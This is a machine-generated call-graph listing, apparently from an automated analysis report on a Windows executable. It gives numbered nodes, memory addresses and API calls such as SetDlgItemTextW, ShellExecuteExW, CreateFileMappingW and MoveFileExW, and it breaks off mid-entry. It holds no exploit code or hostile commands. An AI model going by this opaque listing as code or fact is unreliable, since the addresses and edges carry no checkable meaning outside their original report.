22170->22178 22179 7ff606386e5c 33 API calls 22170->22179 22176 7ff606381b70 31 API calls 22171->22176 22181 7ff60639ff38 22173->22181 22189 7ff60639ffd9 GetDlgItem SetFocus 22173->22189 22212 7ff60639ff4d 22173->22212 22183 7ff60639f29e 22175->22183 22184 7ff60639f91c 22176->22184 22178->22048 22187 7ff60639f5c5 22179->22187 22188 7ff60639f9c8 22180->22188 22190 7ff6063a5c30 _handle_error 8 API calls 22181->22190 22589 7ff60638bc90 131 API calls 22183->22589 22193 7ff606381b70 31 API calls 22184->22193 22201 7ff60638aee0 48 API calls 22186->22201 22597 7ff606381170 33 API calls memcpy_s 22187->22597 22197 7ff606381b70 31 API calls 22188->22197 22194 7ff6063a000a 22189->22194 22198 7ff6063a05e7 22190->22198 22193->22102 22206 7ff6063812bc 33 API calls 22194->22206 22195 7ff60639f20a 22200 7ff606381b70 31 API calls 22195->22200 22203 7ff60639f9d3 22197->22203 22199 7ff60639f2b8 22205 7ff60638da04 48 API calls 22199->22205 22207 7ff60639f218 22200->22207 22208 7ff60639f6f7 SetDlgItemTextW 22201->22208 22202 7ff60639f5da 22209 7ff60638aee0 48 API calls 22202->22209 22210 7ff606381b70 31 API calls 22203->22210 22204 7ff60639ff84 SendDlgItemMessageW 22213 7ff60639ffa4 22204->22213 22214 7ff60639ffad EndDialog 22204->22214 22215 7ff60639f2fa GetCommandLineW 22205->22215 22216 7ff6063a001c 22206->22216 22228 7ff606384334 51 API calls 22207->22228 22217 7ff606382134 22208->22217 22211 7ff60639f5e7 22209->22211 22210->22048 22598 7ff606381170 33 API calls memcpy_s 22211->22598 22212->22181 22212->22204 22213->22214 22214->22181 22220 7ff60639f39f 22215->22220 22221 7ff60639f3b9 22215->22221 22600 7ff606388e0c 22216->22600 22218 7ff60639f715 SetDlgItemTextW GetDlgItem 22217->22218 22223 7ff60639f740 GetWindowLongPtrW SetWindowLongPtrW 22218->22223 22224 7ff60639f763 22218->22224 22238 7ff606381c80 33 API calls 22220->22238 22590 7ff60639e6a4 33 API calls _handle_error 22221->22590 22223->22224 22399 7ff6063a09d8 22224->22399 22225 7ff60639f5fa 22230 7ff606381b70 31 API calls 22225->22230 22233 7ff60639f23e 22228->22233 22237 7ff60639f605 22230->22237 22231 7ff60638210c SetDlgItemTextW 22239 7ff6063a0044 22231->22239 22232 7ff60639f3ca 22591 7ff60639e6a4 33 API calls _handle_error 22232->22591 22234 7ff60639f245 GetLastError 22233->22234 22235 7ff60639f254 22233->22235 22234->22235 22241 7ff60638424c 100 API calls 22235->22241 22243 7ff606381b70 31 API calls 22237->22243 22238->22221 22248 7ff6063a0076 SendDlgItemMessageW FindFirstFileW 22239->22248 22245 7ff60639f261 22241->22245 22242 7ff6063a09d8 185 API calls 22246 7ff60639f78c 22242->22246 22247 7ff60639f613 22243->22247 22244 7ff60639f3db 22592 7ff60639e6a4 33 API calls _handle_error 22244->22592 22250 7ff606381b70 31 API calls 22245->22250 22551 7ff6063a34c4 22246->22551 22257 7ff60638aee0 48 API calls 22247->22257 22252 7ff6063a00cb 22248->22252 22344 7ff6063a0554 22248->22344 22250->22163 22262 7ff60638aee0 48 API calls 22252->22262 22253 7ff60639f3ec 22593 7ff60638bd30 131 API calls 22253->22593 22256 7ff6063a09d8 185 API calls 22273 7ff60639f7ba 22256->22273 22261 7ff60639f62b 22257->22261 22258 7ff60639f403 22594 7ff6063a36e0 33 API calls 22258->22594 22259 7ff6063a05d1 22259->22181 22260 7ff6063a05f9 22264 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22260->22264 22274 7ff6063812bc 33 API calls 22261->22274 22266 7ff6063a00ee 22262->22266 22268 7ff6063a05fe 22264->22268 22265 7ff60639f7e6 22559 7ff606381e98 GetDlgItem EnableWindow 22265->22559 22275 7ff6063812bc 33 API calls 22266->22275 22267 7ff60639f422 CreateFileMappingW 22270 7ff60639f461 MapViewOfFile 22267->22270 22271 7ff60639f4a3 ShellExecuteExW 22267->22271 22276 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22268->22276 22595 7ff6063a6e10 22270->22595 22290 7ff60639f4c4 22271->22290 22273->22265 22277 7ff6063a09d8 185 API calls 22273->22277 22285 7ff60639f654 22274->22285 22278 7ff6063a011d 22275->22278 22279 7ff6063a0604 22276->22279 22277->22265 22604 7ff606381170 33 API calls memcpy_s 22278->22604 22283 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22279->22283 22281 7ff6063a0138 22605 7ff6063852c0 33 API calls 2 library calls 22281->22605 22282 7ff60639f513 22291 7ff60639f53f 22282->22291 22292 7ff60639f52c UnmapViewOfFile CloseHandle 22282->22292 22287 7ff6063a060a 22283->22287 22284 7ff60639f6aa 22288 7ff606381b70 31 API calls 22284->22288 22285->22133 22285->22284 22295 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22287->22295 22288->22178 22289 7ff6063a014f 22293 7ff606381b70 31 API calls 22289->22293 22290->22282 22297 7ff60639f501 Sleep 22290->22297 22291->22108 22294 7ff60639f575 22291->22294 22292->22291 22296 7ff6063a015c 22293->22296 22299 7ff606381b70 31 API calls 22294->22299 22298 7ff6063a0610 22295->22298 22296->22268 22301 7ff606381b70 31 API calls 22296->22301 22297->22282 22297->22290 22302 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22298->22302 22300 7ff60639f592 22299->22300 22303 7ff606381b70 31 API calls 22300->22303 22304 7ff6063a01c3 22301->22304 22305 7ff6063a0616 22302->22305 22303->22170 22306 7ff60638210c SetDlgItemTextW 22304->22306 22308 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22305->22308 22307 7ff6063a01d7 FindClose 22306->22307 22309 7ff6063a01f3 22307->22309 22310 7ff6063a02e7 SendDlgItemMessageW 22307->22310 22311 7ff6063a061c 22308->22311 22606 7ff60639de44 10 API calls _handle_error 22309->22606 22312 7ff6063a031b 22310->22312 22315 7ff60638aee0 48 API calls 22312->22315 22314 7ff6063a0216 22316 7ff60638aee0 48 API calls 22314->22316 22317 7ff6063a0328 22315->22317 22318 7ff6063a021f 22316->22318 22320 7ff6063812bc 33 API calls 22317->22320 22319 7ff60638da04 48 API calls 22318->22319 22325 7ff6063a023c memcpy_s 22319->22325 22322 7ff6063a0357 22320->22322 22321 7ff606381b70 31 API calls 22323 7ff6063a02d3 22321->22323 22607 7ff606381170 33 API calls memcpy_s 22322->22607 22326 7ff60638210c SetDlgItemTextW 22323->22326 22325->22279 22325->22321 22326->22310 22327 7ff6063a0372 22608 7ff6063852c0 33 API calls 2 library calls 22327->22608 22329 7ff6063a0389 22330 7ff606381b70 31 API calls 22329->22330 22331 7ff6063a0395 memcpy_s 22330->22331 22332 7ff606381b70 31 API calls 22331->22332 22333 7ff6063a03cf 22332->22333 22334 7ff606381b70 31 API calls 22333->22334 22335 7ff6063a03dc 22334->22335 22335->22287 22336 7ff606381b70 31 API calls 22335->22336 22337 7ff6063a0443 22336->22337 22338 7ff60638210c SetDlgItemTextW 22337->22338 22339 7ff6063a0457 22338->22339 22339->22344 22609 7ff60639de44 10 API calls _handle_error 22339->22609 22341 7ff6063a0482 22342 7ff60638aee0 48 API calls 22341->22342 22343 7ff6063a048c 22342->22343 22345 7ff60638da04 48 API calls 22343->22345 22344->22181 22344->22259 22344->22260 22344->22305 22347 7ff6063a04a9 memcpy_s 22345->22347 22346 7ff606381b70 31 API calls 22348 7ff6063a0540 22346->22348 22347->22298 22347->22346 22349 7ff60638210c SetDlgItemTextW 22348->22349 22349->22344 22351 7ff60638216a 22350->22351 22352 7ff6063821d0 22350->22352 22351->22352 22610 7ff60638a8ac 22351->22610 22352->22009 22354 7ff60638218f 22354->22352 22355 7ff6063821a4 GetDlgItem 22354->22355 22355->22352 22356 7ff6063821b7 22355->22356 22356->22352 22357 7ff6063821be SetWindowTextW 22356->22357 22357->22352 22359 7ff606381efc 22358->22359 22360 7ff606381f34 22358->22360 22362 7ff6063812bc 33 API calls 22359->22362 22660 7ff606381ff8 GetWindowTextLengthW 22360->22660 22363 7ff606381f2a memcpy_s 22362->22363 22364 7ff606381f89 22363->22364 22365 7ff606381b70 31 API calls 22363->22365 22368 7ff606381ff0 22364->22368 22369 7ff606381fc8 22364->22369 22365->22364 22366 7ff6063a5c30 _handle_error 8 API calls 22367 7ff606381fdd 22366->22367 22367->22037 22367->22038 22367->22178 22370 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22368->22370 22369->22366 22371 7ff606381ff5 22370->22371 22377 7ff6063a2b00 22372->22377 22373 7ff6063a2b27 22374 7ff6063a5c30 _handle_error 8 API calls 22373->22374 22375 7ff60639f087 22374->22375 22375->22073 22376 7ff606386e5c 33 API calls 22378 7ff6063a2b7a 22376->22378 22377->22373 22377->22376 22672 7ff606381170 33 API calls memcpy_s 22378->22672 22380 7ff6063a2b8f 22381 7ff606381b70 31 API calls 22380->22381 22383 7ff6063a2b9f memcpy_s 22380->22383 22381->22383 22382 7ff606381b70 31 API calls 22384 7ff6063a2bc6 22382->22384 22383->22382 22385 7ff606381b70 31 API calls 22384->22385 22385->22373 22387 7ff606388d03 22386->22387 22388 7ff606388d06 SetCurrentDirectoryW 22386->22388 22387->22388 22388->22153 22390 7ff606385265 22389->22390 22391 7ff60638527a 22390->22391 22392 7ff6063812bc 33 API calls 22390->22392 22393 7ff6063a5c30 _handle_error 8 API calls 22391->22393 22392->22391 22394 7ff6063852b1 22393->22394 22395 7ff60639d1bc 22394->22395 22396 7ff60639d1e3 22395->22396 22673 7ff6063860e0 22396->22673 22398 7ff60639d1f3 memcpy_s 22398->22195 22682 7ff60639e558 22399->22682 22401 7ff6063a0d3e 22402 7ff606381b70 31 API calls 22401->22402 22403 7ff6063a0d47 22402->22403 22405 7ff6063a5c30 _handle_error 8 API calls 22403->22405 22404 7ff60638d124 33 API calls 22526 7ff6063a0a53 memcpy_s 22404->22526 22406 7ff60639f77b 22405->22406 22406->22242 22407 7ff6063a2a4a 22753 7ff60638353c 47 API calls 22407->22753 22410 7ff6063a2a50 22754 7ff60638353c 47 API calls 22410->22754 22412 7ff6063a2a56 22416 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22412->22416 22414 7ff6063a2a3e 22415 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22414->22415 22417 7ff6063a2a44 22415->22417 22419 7ff6063a2a5c 22416->22419 22752 7ff60638353c 47 API calls 22417->22752 22421 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22419->22421 22423 7ff6063a2a62 22421->22423 22422 7ff6063a299a 22424 7ff6063a2a22 22422->22424 22425 7ff606381c80 33 API calls 22422->22425 22428 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22423->22428 22750 7ff606381b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 22424->22750 22430 7ff6063a29c7 22425->22430 22426 7ff6063a2a38 22751 7ff606381bd4 33 API calls std::_Xinvalid_argument 22426->22751 22427 7ff6063813c4 33 API calls 22431 7ff6063a178a GetTempPathW 22427->22431 22433 7ff6063a2a68 22428->22433 22749 7ff60639e738 33 API calls 3 library calls 22430->22749 22431->22526 22432 7ff606387a28 35 API calls 22432->22526 22437 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22433->22437 22436 7ff6063888f8 33 API calls 22436->22526 22441 7ff6063a2a6e 22437->22441 22439 7ff6063a29dd 22447 7ff606381b70 31 API calls 22439->22447 22450 7ff6063a29f4 memcpy_s 22439->22450 22440 7ff606382120 SetWindowTextW 22440->22526 22448 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22441->22448 22443 7ff6063af094 43 API calls 22443->22526 22444 7ff606381b70 31 API calls 22444->22424 22445 7ff606381c04 33 API calls 22445->22526 22446 7ff6063a2343 22446->22424 22446->22426 22449 7ff6063a5ae0 4 API calls 22446->22449 22457 7ff6063a238b memcpy_s 22446->22457 22447->22450 22452 7ff6063a2a74 22448->22452 22449->22457 22450->22444 22456 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22452->22456 22453 7ff60639e558 33 API calls 22453->22526 22454 7ff606381c80 33 API calls 22454->22526 22455 7ff6063a2abc 22757 7ff606381bd4 33 API calls std::_Xinvalid_argument 22455->22757 22461 7ff6063a2a7a 22456->22461 22466 7ff606381c80 33 API calls 22457->22466 22513 7ff6063a26df 22457->22513 22459 7ff606381b70 31 API calls 22459->22422 22460 7ff6063a2ac8 22759 7ff606381bd4 33 API calls std::_Xinvalid_argument 22460->22759 22472 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22461->22472 22462 7ff6063a2ac2 22758 7ff606381b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 22462->22758 22463 7ff606381c80 33 API calls 22545 7ff6063a0fd9 22463->22545 22465 7ff6063a2ab6 22756 7ff606381b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 22465->22756 22473 7ff6063a24b3 22466->22473 22469 7ff6063a2890 22469->22460 22469->22462 22487 7ff6063a288b memcpy_s 22469->22487 22492 7ff6063a5ae0 4 API calls 22469->22492 22471 7ff6063a277a 22471->22455 22471->22465 22479 7ff6063a27c2 memcpy_s 22471->22479 22471->22487 22489 7ff6063a5ae0 4 API calls 22471->22489 22478 7ff6063a2a80 22472->22478 22480 7ff6063a2ab0 22473->22480 22488 7ff6063812bc 33 API calls 22473->22488 22476 7ff606381b70 31 API calls 22476->22526 22477 7ff606385ff4 51 API calls 22477->22526 22493 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22478->22493 22687 7ff6063a3030 22479->22687 22755 7ff60638353c 47 API calls 22480->22755 22482 7ff6063a1139 GetDlgItem 22490 7ff606382120 SetWindowTextW 22482->22490 22483 7ff60638db98 33 API calls 22483->22526 22485 7ff60639d6d8 31 API calls 22485->22526 22487->22459 22494 7ff6063a24f6 22488->22494 22489->22479 22495 7ff6063a1158 SendMessageW 22490->22495 22492->22487 22499 7ff6063a2a86 22493->22499 22745 7ff60638d124 22494->22745 22495->22545 22496 7ff606385890 51 API calls 22496->22526 22497 7ff606382274 31 API calls 22497->22526 22502 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22499->22502 22501 7ff6063872ac 53 API calls 22501->22526 22506 7ff6063a2a8c 22502->22506 22503 7ff6063a118c SendMessageW 22503->22545 22504 7ff606385790 51 API calls 22504->22526 22505 7ff6063862f0 54 API calls 22505->22526 22510 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22506->22510 22508 7ff6063871f4 33 API calls 22508->22526 22514 7ff6063a2a92 22510->22514 22511 7ff60638885c 8 API calls 22511->22526 22512 7ff6063a2aa4 22516 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22512->22516 22513->22469 22513->22471 22513->22512 22515 7ff6063a2aaa 22513->22515 22520 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22514->22520 22517 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22515->22517 22516->22515 22517->22480 22518 7ff606385238 33 API calls 22518->22526 22523 7ff6063a2a98 22520->22523 22521 7ff606386dd8 33 API calls 22521->22526 22522 7ff60638587c 51 API calls 22522->22526 22527 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22523->22527 22524 7ff606382314 33 API calls 22524->22526 22525 7ff6063852c0 33 API calls 22525->22526 22526->22401 22526->22404 22526->22407 22526->22410 22526->22414 22526->22417 22526->22419 22526->22422 22526->22423 22526->22427 22526->22432 22526->22433 22526->22436 22526->22440 22526->22441 22526->22443 22526->22445 22526->22446 22526->22452 22526->22453 22526->22454 22526->22461 22526->22476 22526->22477 22526->22478 22526->22483 22526->22485 22526->22496 22526->22497 22526->22499 22526->22501 22526->22504 22526->22505 22526->22506 22526->22508 22526->22511 22526->22514 22526->22518 22526->22521 22526->22522 22526->22524 22526->22525 22528 7ff60638210c SetDlgItemTextW 22526->22528 22531 7ff606388b28 47 API calls 22526->22531 22541 7ff6063a1ae9 EndDialog 22526->22541 22544 7ff6063a1671 MoveFileW 22526->22544 22526->22545 22547 7ff6063812bc 33 API calls 22526->22547 22549 7ff60638552c 56 API calls 22526->22549 22686 7ff606390aa0 CompareStringW 22526->22686 22725 7ff60638ce9c 35 API calls _invalid_parameter_noinfo_noreturn 22526->22725 22726 7ff60639d26c 33 API calls Concurrency::cancel_current_task 22526->22726 22727 7ff6063a3f3c 31 API calls _invalid_parameter_noinfo_noreturn 22526->22727 22729 7ff60639e384 33 API calls _invalid_parameter_noinfo_noreturn 22526->22729 22730 7ff60639d154 33 API calls 22526->22730 22733 7ff60639e738 33 API calls 3 library calls 22526->22733 22734 7ff606386448 33 API calls 22526->22734 22735 7ff606387d6c 33 API calls 3 library calls 22526->22735 22736 7ff606381734 33 API calls 4 library calls 22526->22736 22737 7ff606381170 33 API calls memcpy_s 22526->22737 22738 7ff606386260 FindClose 22526->22738 22739 7ff606390ad0 CompareStringW 22526->22739 22740 7ff60639d848 47 API calls 22526->22740 22741 7ff60639c414 51 API calls 3 library calls 22526->22741 22742 7ff60639e6a4 33 API calls _handle_error 22526->22742 22743 7ff606387254 CompareStringW 22526->22743 22744 7ff606388be4 47 API calls 22526->22744 22529 7ff6063a2a9e 22527->22529 22528->22526 22533 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22529->22533 22531->22526 22533->22512 22534 7ff6063a2521 22534->22513 22534->22523 22534->22529 22536 7ff606381b70 31 API calls 22534->22536 22537 7ff6063812bc 33 API calls 22534->22537 22540 7ff606390aa0 CompareStringW 22534->22540 22543 7ff60638d124 33 API calls 22534->22543 22536->22534 22537->22534 22540->22534 22541->22526 22543->22534 22544->22545 22546 7ff6063a16a5 MoveFileExW 22544->22546 22545->22412 22545->22463 22545->22503 22545->22526 22548 7ff606381b70 31 API calls 22545->22548 22728 7ff606388ebc 47 API calls memcpy_s 22545->22728 22731 7ff606382274 31 API calls _invalid_parameter_noinfo_noreturn 22545->22731 22732 7ff60639df84 145 API calls 2 library calls 22545->22732 22546->22545 22547->22526 22548->22545 22549->22526 22552 7ff6063a34dd 22551->22552 22553 7ff606381c80 33 API calls 22552->22553 22554 7ff6063a34f3 22553->22554 22555 7ff6063a3528 22554->22555 22556 7ff606381c80 33 API calls 22554->22556 22765 7ff606399a70 22555->22765 22556->22555 22561 7ff60639c12c 4 API calls 22560->22561 22562 7ff6063a2f0f 22561->22562 22563 7ff6063a3007 22562->22563 22564 7ff6063a2f17 GetWindow 22562->22564 22565 7ff6063a5c30 _handle_error 8 API calls 22563->22565 22569 7ff6063a2f32 22564->22569 22566 7ff60639f9eb 22565->22566 22566->22017 22566->22018 22567 7ff6063a2f3e GetClassNameW 22958 7ff606390aa0 CompareStringW 22567->22958 22569->22563 22569->22567 22570 7ff6063a2f67 GetWindowLongPtrW 22569->22570 22571 7ff6063a2fe6 GetWindow 22569->22571 22570->22571 22572 7ff6063a2f79 SendMessageW 22570->22572 22571->22563 22571->22569 22572->22571 22573 7ff6063a2f95 GetObjectW 22572->22573 22959 7ff60639c194 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 22573->22959 22575 7ff6063a2fb1 22576 7ff60639c15c 4 API calls 22575->22576 22960 7ff60639ca30 16 API calls _handle_error 22575->22960 22576->22575 22578 7ff6063a2fc9 SendMessageW DeleteObject 22578->22571 22580 7ff60638212a SetWindowTextW 22579->22580 22581 7ff606382127 22579->22581 22582 7ff6063ef290 22580->22582 22581->22580 22583->22042 22584->22104 22586 7ff606385890 51 API calls 22585->22586 22587 7ff606385885 22586->22587 22587->22116 22587->22142 22588->22116 22589->22199 22590->22232 22591->22244 22592->22253 22593->22258 22594->22267 22596 7ff6063a6df0 22595->22596 22596->22271 22597->22202 22598->22225 22599->22155 22601 7ff606388e49 22600->22601 22603 7ff606388e32 22600->22603 22961 7ff606383550 33 API calls 22601->22961 22603->22231 22604->22281 22605->22289 22606->22314 22607->22327 22608->22329 22609->22341 22611 7ff6063861e8 swprintf 46 API calls 22610->22611 22612 7ff60638a909 22611->22612 22613 7ff606390688 WideCharToMultiByte 22612->22613 22614 7ff60638a919 22613->22614 22615 7ff60638a989 22614->22615 22629 7ff606389c00 31 API calls 22614->22629 22632 7ff60638a96a SetDlgItemTextW 22614->22632 22635 7ff606389808 22615->22635 22618 7ff60638aaf2 GetSystemMetrics GetWindow 22622 7ff60638ac21 22618->22622 22633 7ff60638ab1d 22618->22633 22619 7ff60638aa03 22620 7ff60638aac2 22619->22620 22621 7ff60638aa0c GetWindowLongPtrW 22619->22621 22651 7ff6063899a8 22620->22651 22650 7ff6063ef270 22621->22650 22623 7ff6063a5c30 _handle_error 8 API calls 22622->22623 22626 7ff60638ac30 22623->22626 22626->22354 22629->22614 22630 7ff60638aae5 SetWindowTextW 22630->22618 22631 7ff60638ab3e GetWindowRect 22631->22633 22632->22614 22633->22622 22633->22631 22634 7ff60638ac00 GetWindow 22633->22634 22634->22622 22634->22633 22636 7ff6063899a8 47 API calls 22635->22636 22639 7ff60638984f 22636->22639 22637 7ff60638995a 22638 7ff6063a5c30 _handle_error 8 API calls 22637->22638 22640 7ff60638998e GetWindowRect GetClientRect 22638->22640 22639->22637 22641 7ff6063812bc 33 API calls 22639->22641 22640->22618 22640->22619 22642 7ff60638989c 22641->22642 22643 7ff6063812bc 33 API calls 22642->22643 22649 7ff6063899a1 22642->22649 22646 7ff606389914 22643->22646 22644 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22645 7ff6063899a7 22644->22645 22646->22637 22647 7ff60638999c 22646->22647 22648 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22647->22648 22648->22649 22649->22644 22652 7ff6063861e8 swprintf 46 API calls 22651->22652 22653 7ff6063899eb 22652->22653 22654 7ff606390688 WideCharToMultiByte 22653->22654 22655 7ff606389a03 22654->22655 22656 7ff606389c00 31 API calls 22655->22656 22657 7ff606389a1b 22656->22657 22658 7ff6063a5c30 _handle_error 8 API calls 22657->22658 22659 7ff606389a2b 22658->22659 22659->22618 22659->22630 22661 7ff6063813c4 33 API calls 22660->22661 22662 7ff606382062 GetWindowTextW 22661->22662 22663 7ff606382094 22662->22663 22664 7ff6063812bc 33 API calls 22663->22664 22665 7ff6063820a2 22664->22665 22667 7ff606382105 22665->22667 22670 7ff6063820dd 22665->22670 22666 7ff6063a5c30 _handle_error 8 API calls 22668 7ff6063820f3 22666->22668 22669 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22667->22669 22668->22363 22671 7ff60638210a 22669->22671 22670->22666 22672->22380 22674 7ff6063861da 22673->22674 22675 7ff60638610f 22673->22675 22681 7ff60638353c 47 API calls 22674->22681 22679 7ff60638611f memcpy_s 22675->22679 22680 7ff606385004 33 API calls 2 library calls 22675->22680 22679->22398 22680->22679 22683 7ff60639e586 22682->22683 22684 7ff60639e57f 22682->22684 22683->22684 22760 7ff606381734 33 API calls 4 library calls 22683->22760 22684->22526 22686->22526 22694 7ff6063a3079 memcpy_s 22687->22694 22703 7ff6063a33cd 22687->22703 22688 7ff606381b70 31 API calls 22689 7ff6063a33ec 22688->22689 22690 7ff6063a5c30 _handle_error 8 API calls 22689->22690 22691 7ff6063a33f8 22690->22691 22691->22487 22692 7ff6063a31d4 22695 7ff6063812bc 33 API calls 22692->22695 22694->22692 22761 7ff606390aa0 CompareStringW 22694->22761 22696 7ff6063a3210 22695->22696 22697 7ff60638587c 51 API calls 22696->22697 22698 7ff6063a321a 22697->22698 22699 7ff606381b70 31 API calls 22698->22699 22702 7ff6063a3225 22699->22702 22700 7ff6063a3292 ShellExecuteExW 22701 7ff6063a3396 22700->22701 22708 7ff6063a32a5 22700->22708 22701->22703 22706 7ff6063a344b 22701->22706 22702->22700 22705 7ff6063812bc 33 API calls 22702->22705 22703->22688 22704 7ff6063a32de 22763 7ff6063a3928 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 22704->22763 22709 7ff6063a3267 22705->22709 22710 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22706->22710 22707 7ff6063a3333 CloseHandle 22711 7ff6063a3342 22707->22711 22712 7ff6063a3351 22707->22712 22708->22704 22708->22707 22716 7ff6063a32d1 ShowWindow 22708->22716 22762 7ff6063872ac 53 API calls 2 library calls 22709->22762 22714 7ff6063a3450 22710->22714 22764 7ff606390aa0 CompareStringW 22711->22764 22712->22701 22722 7ff6063a3387 ShowWindow 22712->22722 22716->22704 22718 7ff6063a3275 22719 7ff606381b70 31 API calls 22718->22719 22721 7ff6063a327f 22719->22721 22720 7ff6063a32f6 22720->22707 22723 7ff6063a3304 GetExitCodeProcess 22720->22723 22721->22700 22722->22701 22723->22707 22724 7ff6063a3317 22723->22724 22724->22707 22725->22526 22726->22526 22727->22526 22728->22545 22729->22526 22730->22526 22732->22482 22733->22526 22734->22526 22735->22526 22736->22526 22737->22526 22739->22526 22740->22526 22741->22526 22742->22526 22743->22526 22744->22526 22746 7ff60638d156 22745->22746 22747 7ff60638d18a 22746->22747 22748 7ff606381734 33 API calls 22746->22748 22747->22534 22748->22746 22749->22439 22760->22683 22761->22692 22762->22718 22763->22720 22764->22712 22766 7ff606399a80 memcpy_s _snwprintf 22765->22766 22783 7ff60638bb9c 22766->22783 22768 7ff606399b1e memcpy_s 22786 7ff606399518 22768->22786 22770 7ff606399b7a 22792 7ff60638bbf8 22770->22792 22772 7ff606399b88 22773 7ff606399bcb 22772->22773 22775 7ff606399cf4 22772->22775 22797 7ff606399cfc 22773->22797 22777 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22775->22777 22779 7ff606399cf9 22777->22779 22780 7ff6063a5c30 _handle_error 8 API calls 22781 7ff606399cde 22780->22781 22781->22256 22782 7ff606399bd9 22782->22780 22784 7ff6063813c4 33 API calls 22783->22784 22785 7ff60638bbc1 22784->22785 22785->22768 22787 7ff60639959f memcpy_s 22786->22787 22788 7ff606381b70 31 API calls 22787->22788 22789 7ff6063997d0 memcpy_s 22787->22789 22788->22789 22791 7ff60639986f 22789->22791 22825 7ff606397fa8 33 API calls 22789->22825 22791->22770 22791->22791 22793 7ff60638bc06 shared_ptr 22792->22793 22794 7ff60638bc39 22793->22794 22795 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22793->22795 22794->22772 22796 7ff60638bc5a 22795->22796 22798 7ff606399d0a 22797->22798 22800 7ff606399bd5 22798->22800 22826 7ff606383c7c 82 API calls 22798->22826 22800->22782 22801 7ff606396d28 22800->22801 22827 7ff6063976f8 22801->22827 22806 7ff6063a5c30 _handle_error 8 API calls 22808 7ff606396fa2 22806->22808 22807 7ff606382314 33 API calls 22811 7ff606396d85 22807->22811 22808->22782 22809 7ff606391dd0 64 API calls 22809->22811 22810 7ff606386288 55 API calls 22810->22811 22811->22807 22811->22809 22811->22810 22812 7ff606396ea0 22811->22812 22814 7ff606396fc4 22811->22814 22816 7ff606396fbf 22811->22816 22824 7ff606396f52 22811->22824 22813 7ff606396f1f 22812->22813 22812->22814 22812->22816 22856 7ff60639524c 22813->22856 22818 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22814->22818 22819 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22816->22819 22817 7ff606396f37 22821 7ff606396f43 22817->22821 22822 7ff606396f54 22817->22822 22820 7ff606396fca 22818->22820 22819->22814 22863 7ff6063839e0 82 API calls 22821->22863 22822->22824 22864 7ff606383ca0 100 API calls 22822->22864 22824->22806 22825->22791 22826->22800 22828 7ff606386288 55 API calls 22827->22828 22829 7ff606397760 22828->22829 22830 7ff606394e68 107 API calls 22829->22830 22835 7ff60639777b 22829->22835 22831 7ff606397777 22830->22831 22831->22835 22865 7ff606399db0 22831->22865 22833 7ff6063979a6 22836 7ff6063a5c30 _handle_error 8 API calls 22833->22836 22835->22833 22838 7ff6063979db 22835->22838 22837 7ff606396d5a 22836->22837 22837->22811 22837->22822 22862 7ff6063839e0 82 API calls 22837->22862 22839 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22838->22839 22841 7ff6063979e0 22839->22841 22846 7ff60639524c 103 API calls 22847 7ff60639787a 22846->22847 22847->22835 22857 7ff60639528a 22856->22857 22858 7ff606395280 22856->22858 22857->22858 22860 7ff606384c40 101 API calls 22857->22860 22858->22817 22859 7ff6063952ae 22861 7ff606384d50 101 API calls 22859->22861 22860->22859 22861->22858 22862->22811 22863->22824 22873 7ff606384c40 101 API calls 22865->22873 22866 7ff606399de5 22874 7ff606384a70 104 API calls 22866->22874 22867 7ff606399e00 22871 7ff606399e51 22867->22871 22875 7ff606384c40 101 API calls 22867->22875 22868 7ff6063a5c30 _handle_error 8 API calls 22869 7ff60639778f 22868->22869 22876 7ff6063845f0 22869->22876 22870 7ff606399e36 22872 7ff606384a70 104 API calls 22870->22872 22871->22868 22872->22871 22873->22866 22874->22867 22875->22870 22884 7ff606384d50 101 API calls 22876->22884 22877 7ff60638460f 22881 7ff606384c40 101 API calls 22877->22881 22878 7ff606384628 22882 7ff606384d50 101 API calls 22878->22882 22879 7ff606384638 22883 7ff606384c40 101 API calls 22879->22883 22880 7ff606384651 22885 7ff6063971b4 22880->22885 22881->22878 22882->22879 22883->22880 22884->22877 22886 7ff6063971f6 22885->22886 22887 7ff60639728a 22885->22887 22889 7ff6063953bc 120 API calls 22886->22889 22898 7ff6063972f6 22887->22898 22902 7ff606384c40 101 API calls 22887->22902 22888 7ff6063972cd 22901 7ff606384d50 101 API calls 22888->22901 22897 7ff606397221 22889->22897 22890 7ff606397453 22893 